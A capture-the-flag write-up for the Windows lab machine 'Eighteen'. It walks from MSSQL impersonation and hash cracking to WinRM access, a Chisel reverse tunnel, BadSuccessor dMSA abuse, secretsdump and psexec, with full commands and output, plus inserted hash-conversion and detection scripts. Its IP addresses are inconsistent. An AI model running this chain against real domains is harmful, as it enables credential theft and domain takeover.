Machine Info
- Name: Eighteen
- Difficulty: Easy (Windows Active Directory)
- IP: 10.129.70.135 (referred to as $target in commands)
- OS: Windows Server (Domain Controller — DC01.eighteen.htb)
- Key Techniques: MSSQL Enumeration & Impersonation → PBKDF2 Hash Cracking → Domain User Enumeration → WinRM Foothold → AD ACL Abuse (CreateChild on Staff OU) → dMSA Abuse (BadSuccessor / SharpSuccessor) → Impersonate Administrator
Attack Chain Summary (one-liner from the notes): “The user adam.scott, member of the IT group, had CreateChild permissions over the Staff OU, allowing the creation of a malicious dMSA object, which was abused to impersonate the Domain Administrator.”
Scanning
First, run a port scan.
The following example runs a port scan using a prepared shell script.
##################
# Port scan tool #
##################
*Detailed scan :1
*Full scan :2
***Select scanning method by number***
1
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 22:21 JST
Nmap scan report for 10.129.7.197
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2026-01-22T20:21:44+00:00; +7h00m01s from scanner time.
| ms-sql-ntlm-info:
| 10.129.7.197:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.7.197:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-22T20:15:14
|_Not valid after: 2056-01-22T20:15:14
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
Scan completed
We will investigate based on the results of the port scan above.
Enumeration
The port scan results confirm that Microsoft SQL Server is running on port 1433.
To enumerate Microsoft SQL Server, use impacket.
impacket
Use impacket-mssqlclient to access Microsoft SQL Server.
$ impacket-mssqlclient kevin:'iNa2we6haRj2gaw!'@10.129.7.197
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (kevin guest@master)>
This enumerates all logins on the SQL Server.
SQL (kevin guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------ --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
kevin SQL_LOGIN 0 0 0 0 0 0 0 0 0
appdev SQL_LOGIN 0 0 0 0 0 0 0 0 0
It appears that kevin has permission to impersonate appdev.
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
Based on the enum_impersonate results, we log in by impersonating the appdev user.
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)>
This enumerates the databases.
SQL (appdev appdev@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
Connect to the financial_planner database.
SQL (appdev appdev@master)> USE financial_planner;
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)>
Check the tables in the financial_planner database.
SQL (appdev appdev@financial_planner)> SELECT name FROM financial_planner.sys.tables;
name
-----------
users
incomes
expenses
allocations
analytics
visits
Looking at the column information of the users table, we can see that it contains password hashes.
SQL (appdev appdev@financial_planner)> SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users';
column_name data_type
------------- ---------
id int
full_name nvarchar
username nvarchar
email nvarchar
password_hash nvarchar
is_admin bit
created_at datetime
By retrieving the rows of the users table, I was able to confirm the administrator's password hash.
SQL (appdev appdev@financial_planner)> SELECT * FROM users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
Hash analysis
Checking with hashcat shows that the password appears to be in Django's (PBKDF2-SHA256) hash format.
$ hashcat -m 10000 --example-hashes
hashcat (v7.1.2) starting in hash-info mode
Hash Info:
==========
Hash mode #10000
Name................: Django (PBKDF2-SHA256)
Category............: Framework
Slow.Hash...........: Yes
Deprecated..........: No
Deprecated.Notice...: N/A
Password.Type.......: plain
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure
Example.Hash.Format.: plain
Example.Hash........: pbkdf2_sha256$10000$1135411628$bFYX62rfJobJ07VwrUMXfuffLfj2RDM2G6/BrTrUWkE=
Example.Pass........: hashcat
Benchmark.Mask......: ?a?a?a?a?a?a?a
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Keep.Guessing.......: No
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
The PBKDF2-HMAC-SHA256 hash format is $-delimited and consists, from left to right, of the algorithm used, the iteration count, the salt and the base64-encoded hash value.
The stored value carries its digest as hex, so to analyze the hash we first base64-encode the digest.
$ echo '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' | xxd -r -p | base64 -w0
BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
To run hashcat, create a file containing the encoded hash value described above.
pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
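The format change above, as an added example that is not part of the original writeup: the stored value is a Werkzeug (Flask) hash, pbkdf2:<hash>:<iterations>$<salt>$<hex digest>, while hashcat mode 10000 expects the Django layout with a base64 digest; only the digest encoding differs. The script converts the hash from the page between the two layouts and shows how an application verifies a password against such a value (the round-trip uses a constructed hash with a low iteration count).

```python
"""Convert Werkzeug-style PBKDF2 hashes to the Django layout and verify passwords.

Werkzeug (Flask) stores   pbkdf2:<hash>:<iterations>$<salt>$<hex digest>
Django / hashcat -m 10000  pbkdf2_<hash>$<iterations>$<salt>$<base64 digest>
Salt, iteration count and PRF are identical; only the digest encoding differs.
"""
import base64
import hashlib
import hmac
import secrets
import string

# Hash value taken from the writeup's users table.
PAGE_HASH = ("pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
             "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133")


def parse_werkzeug(stored):
    """Return (hash_name, iterations, salt, digest bytes) from a Werkzeug pbkdf2 string."""
    method, salt, hexdigest = stored.split("$", 2)
    parts = method.split(":")
    if len(parts) != 3 or parts[0] != "pbkdf2":
        raise ValueError("not a Werkzeug pbkdf2 hash: %r" % method)
    return parts[1], int(parts[2]), salt, bytes.fromhex(hexdigest)


def to_django_format(stored):
    """Re-encode the digest as base64 so hashcat mode 10000 can read it."""
    hash_name, iterations, salt, digest = parse_werkzeug(stored)
    b64 = base64.b64encode(digest).decode("ascii")
    return "pbkdf2_%s$%d$%s$%s" % (hash_name, iterations, salt, b64)


def make_werkzeug_hash(password, salt=None, iterations=600000, hash_name="sha256"):
    """Produce a hash in the layout Werkzeug writes (16-char alphanumeric salt)."""
    if salt is None:
        alphabet = string.ascii_letters + string.digits
        salt = "".join(secrets.choice(alphabet) for _ in range(16))
    digest = hashlib.pbkdf2_hmac(hash_name, password.encode("utf-8"),
                                 salt.encode("utf-8"), iterations)
    return "pbkdf2:%s:%d$%s$%s" % (hash_name, iterations, salt, digest.hex())


def verify_password(password, stored):
    """Recompute PBKDF2 with the stored salt/iterations and compare in constant time."""
    hash_name, iterations, salt, digest = parse_werkzeug(stored)
    candidate = hashlib.pbkdf2_hmac(hash_name, password.encode("utf-8"),
                                    salt.encode("utf-8"), iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(to_django_format(PAGE_HASH))
    demo = make_werkzeug_hash("correct horse", iterations=1000)  # constructed sample
    print(verify_password("correct horse", demo), verify_password("wrong", demo))
```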
You can check the password with hashcat.
$ hashcat -a 0 -m 10000 hash.txt /usr/share/wordlists/rockyou.txt
pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:REDACTED
nxc
We will enumerate users using nxc.
$ nxc mssql 10.129.7.197 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
MSSQL 10.129.7.197 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.7.197 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.7.197 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.7.197 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.7.197 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.7.197 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.7.197 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.7.197 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.7.197 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.7.197 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.7.197 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.7.197 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.7.197 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.7.197 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.7.197 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.7.197 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.7.197 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.7.197 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.7.197 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.7.197 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.7.197 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.7.197 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.7.197 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.7.197 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.7.197 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.7.197 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.7.197 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.7.197 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.7.197 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.7.197 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.7.197 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.7.197 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.7.197 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.7.197 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.7.197 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.7.197 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.7.197 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.7.197 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.7.197 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.7.197 1433 DC01 1612: EIGHTEEN\dave.green
Based on the nxc results above, we create a list of user names.
- user.txt
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green
Running nxc again with the user list you created, you can confirm that the user adam.scott is valid.
$ nxc winrm 10.129.5.209 -u user.txt -p REDACTED
WINRM 10.129.7.197 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.7.197 5985 DC01 [-] eighteen.htb\jamie.dunn:REDACTED
WINRM 10.129.7.197 5985 DC01 [-] eighteen.htb\jane.smith:REDACTED
WINRM 10.129.7.197 5985 DC01 [-] eighteen.htb\alice.jones:REDACTED
WINRM 10.129.7.197 5985 DC01 [+] eighteen.htb\adam.scott:REDACTED (Pwn3d!)
System hacking
We will use the credentials obtained above to establish a foothold.
Access
Run evil-winrm.
$ evil-winrm -i 10.129.7.197 -u adam.scott -p 'REDACTED'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents>
User flag
You can check the user flag on the Desktop.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> dir
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/22/2026 12:13 PM 34 user.txt
Root flag
To obtain the root flag, you need to escalate privileges.
The registry shows that the operating system is Windows Server 2025 Datacenter.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName REG_SZ Windows Server 2025 Datacenter
While researching vulnerabilities in Windows Server 2025 Datacenter, I came across the BadSuccessor vulnerability.
BadSuccessor is an Active Directory security flaw that leads to privilege escalation. It arises from the Delegated Managed Service Account (dMSA) feature in Windows Server 2025.
I will upload PowerView.ps1 for further investigation.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Info: Uploading /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 to C:\Users\adam.scott\Desktop\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
Run the following command to import PowerView.ps1.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Import-Module .\PowerView.ps1
From Find-InterestingDomainAcl we can see that the IT group has the CreateChild permission on the Staff OU.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Find-InterestingDomainAcl
ObjectDN : OU=Staff,DC=eighteen,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass : group
Furthermore, we can confirm that adam.scott belongs to the IT group.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
EIGHTEEN\IT Group S-1-5-21-1152179935-589108180-1989892463-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
I found the BadSuccessor script on GitHub,
https://github.com/b5null/Invoke-BadSuccessor.ps1
so to upload it I start impacket-smbserver to serve it over SMB.
$ impacket-smbserver share . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
Run the following command to mount the share.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> net use Z: \\10.10.14.108\share
The command completed successfully.
Run the following command to copy the script.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> copy Z:\\Invoke-BadSuccessor.ps1 ./
Since access to Active Directory goes through Chisel, run a Chisel server on the attacker side.
$ ./chisel_1.11.3_linux_amd64 server -p 8888 --reverse
2026/01/22 22:57:47 server: Reverse tunnelling enabled
2026/01/22 22:57:47 server: Fingerprint mnznVI7Cc7R0wSKbJOF0+zOfI89YvMNmZrCTCFVJrrA=
2026/01/22 22:57:47 server: Listening on http://0.0.0.0:8888
In the Evil-WinRM shell, copy chisel.exe.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> copy Z:\\chisel.exe .\
Start chisel.exe.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> .\chisel.exe client 10.10.14.108:8888 R:socks
chisel.exe : 2026/01/22 13:01:01 client: Connecting to ws://10.10.14.108:8888
+ CategoryInfo : NotSpecified: (2026/01/22 13:0....10.14.108:8888:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2026/01/22 13:01:04 client: Connected (Latency 250.6274ms)
Run the following command to import the module.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Import-Module .\Invoke-BadSuccessor.ps1
Run the Invoke-BadSuccessor script.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> Invoke-BadSuccessor
[+] Created computer 'Pwn' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Machine Account's sAMAccountName : Pwn$
[+] Machine Account's SID : S-1-5-21-1152179935-589108180-1989892463-12601
[+] Created delegated service account 'attacker_dMSA' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Service Account's sAMAccountName : attacker_dMSA$
[+] Service Account's SID : S-1-5-21-1152179935-589108180-1989892463-12602
[+] Allowed to retrieve password : Pwn$
[+] Added ACE on 'CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb' for 'adam.scott' (S-1-5-21-1152179935-589108180-1989892463-1609) with rights 'All' (Allow, ThisObjectOnly).
[+] Granted 'GenericAll' on 'attacker_dMSA$' to 'adam.scott'.
[+] Configured delegated MSA state for 'attacker_dMSA$' with predecessor:
CN=Administrator,CN=Users,DC=eighteen,DC=htb
[+] Next steps (Rubeus):
Rubeus.exe hash /password:'Password123!' /user:Pwn$ /domain:eighteen.htb
Rubeus.exe asktgt /user:Pwn$ /aes256:<AES256KEY> /domain:eighteen.htb
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:ticket.kirbi /ticket:<BASE64TGT>
[+] Alternative (Impacket):
getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
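A defender-side check for the object changes listed above (the same attributes also appear in the BadSuccessor.exe output further down the page), as an added example that is not part of the writeup or of either tool: it walks constructed Security-log records modelled on event 5137 (directory object created) and 5136 (attribute modified), with field names as those events carry them, and flags dMSA objects whose msDS-ManagedAccountPrecededByLink points at a high-value account. The approved-migrator set and the high-value DN list are assumptions a deployment would fill in.

```python
"""Flag dMSA objects whose predecessor link inherits a privileged account.

Constructed records (not real log data) modelled on Security events 5137 and
5136. Values reproduce the writeup's Invoke-BadSuccessor run plus one legitimate
migration for contrast. APPROVED_MIGRATORS and HIGH_VALUE_DNS are assumptions.
"""
from dataclasses import dataclass

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
PRECEDED_BY = "msDS-ManagedAccountPrecededByLink"
DMSA_STATE = "msDS-DelegatedMSAState"
MIGRATION_COMPLETED = "2"   # state value the writeup's tools set on the dMSA

# Assumed deployment policy: who may run dMSA migrations, and which accounts
# must never be a predecessor.
APPROVED_MIGRATORS = {"svc_admgmt"}
HIGH_VALUE_DNS = {"cn=administrator,cn=users,dc=eighteen,dc=htb"}

ATTACKER_DN = "CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb"
LEGIT_DN = "CN=web_dmsa,CN=Managed Service Accounts,DC=eighteen,DC=htb"

SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": ATTACKER_DN},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": ATTACKER_DN, "AttributeLDAPDisplayName": PRECEDED_BY,
     "AttributeValue": "CN=Administrator,CN=Users,DC=eighteen,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": ATTACKER_DN, "AttributeLDAPDisplayName": DMSA_STATE,
     "AttributeValue": "2"},
    # Legitimate migration: approved operator, ordinary service account.
    {"EventID": 5137, "SubjectUserName": "svc_admgmt", "ObjectClass": DMSA_CLASS,
     "ObjectDN": LEGIT_DN},
    {"EventID": 5136, "SubjectUserName": "svc_admgmt", "ObjectClass": DMSA_CLASS,
     "ObjectDN": LEGIT_DN, "AttributeLDAPDisplayName": PRECEDED_BY,
     "AttributeValue": "CN=svc_web,OU=Staff,DC=eighteen,DC=htb"},
]


@dataclass
class Finding:
    severity: str
    object_dn: str
    actor: str
    reason: str


def analyze(events):
    """Correlate dMSA creation and attribute changes per object DN."""
    findings = []
    predecessors = {}   # dn -> (predecessor DN, actor who set it)
    states = {}         # dn -> msDS-DelegatedMSAState value
    for e in events:
        if e.get("ObjectClass") != DMSA_CLASS:
            continue
        dn, actor = e["ObjectDN"], e["SubjectUserName"]
        if e["EventID"] == 5137 and actor not in APPROVED_MIGRATORS:
            findings.append(Finding("medium", dn, actor,
                                    "dMSA created by non-approved principal"))
        elif e["EventID"] == 5136:
            attr = e["AttributeLDAPDisplayName"]
            if attr == PRECEDED_BY:
                predecessors[dn] = (e["AttributeValue"], actor)
            elif attr == DMSA_STATE:
                states[dn] = e["AttributeValue"]
    for dn, (pred, actor) in predecessors.items():
        privileged = pred.lower() in HIGH_VALUE_DNS
        completed = states.get(dn) == MIGRATION_COMPLETED
        if privileged and completed:
            sev = "critical"   # KDC will hand out the predecessor's identity
        elif privileged or actor not in APPROVED_MIGRATORS:
            sev = "high"
        else:
            continue           # approved operator, ordinary predecessor
        suffix = ", migration marked completed" if completed else ""
        findings.append(Finding(sev, dn, actor, "predecessor link -> " + pred + suffix))
    return findings


def worst_severity(findings):
    order = {"medium": 1, "high": 2, "critical": 3}
    return max((f.severity for f in findings), key=order.get, default="none")


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print("[%s] %s by %s: %s" % (f.severity, f.object_dn, f.actor, f.reason))
```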
On the attacker side, stop time synchronisation.
$ sudo systemctl stop systemd-timesyncd
Check the time on the target side.
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> [DateTime]::UtcNow.ToString("yyyy-MM-dd HH:mm:ss")
Set the attacker's clock to match the target's clock.
% sudo date -u -s '2026-01-21 21:40:36'
I will obtain the TGS ticket.
$ proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Impersonating attacker_dMSA$
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.129.7.197:88 ... OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:82213b9d49ff5d8a7410f5298b9641d10b12d1b0140a2f02e916059ff9589055
[*] EncryptionTypes.rc4_hmac:159cd59d4d328fafa1ae07eb3b00181c
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
Dump the Administrator's hash.
$ KRB5CCNAME=./'attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache' \
  proxychains4 impacket-secretsdump -k -no-pass DC01.eighteen.htb -just-dc-user Administrator
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:49678 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
[*] Cleaning up...
The obtained Kerberos AES key is used to connect with impacket-psexec.
$ proxychains4 impacket-psexec eighteen.htb/administrator@DC01.eighteen.htb -no-pass -k -aesKey '1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Requesting shares on DC01.eighteen.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OQoYebeb.exe
[*] Opening SVCManager on DC01.eighteen.htb.....
[*] Creating service Mrps on DC01.eighteen.htb.....
[*] Starting service Mrps.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
Microsoft Windows [Version 10.0.26100.4349]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>
The root flag can be checked from the Administrator's desktop.
evil-winrm-py -i dc01.eighteen.htb -u administrator -H 0b133be956bfaddf9cea56701affddec
Summary
The BadSuccessor vulnerability sparked a new debate about how vulnerabilities should be disclosed, after Akamai's security team released information about the exploitation of BadSuccessor.
References
- Delegated Managed Service Accounts overview
- BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- The old BadSuccessor is dead, but the new BadSuccessor lives on (?)
-- something else
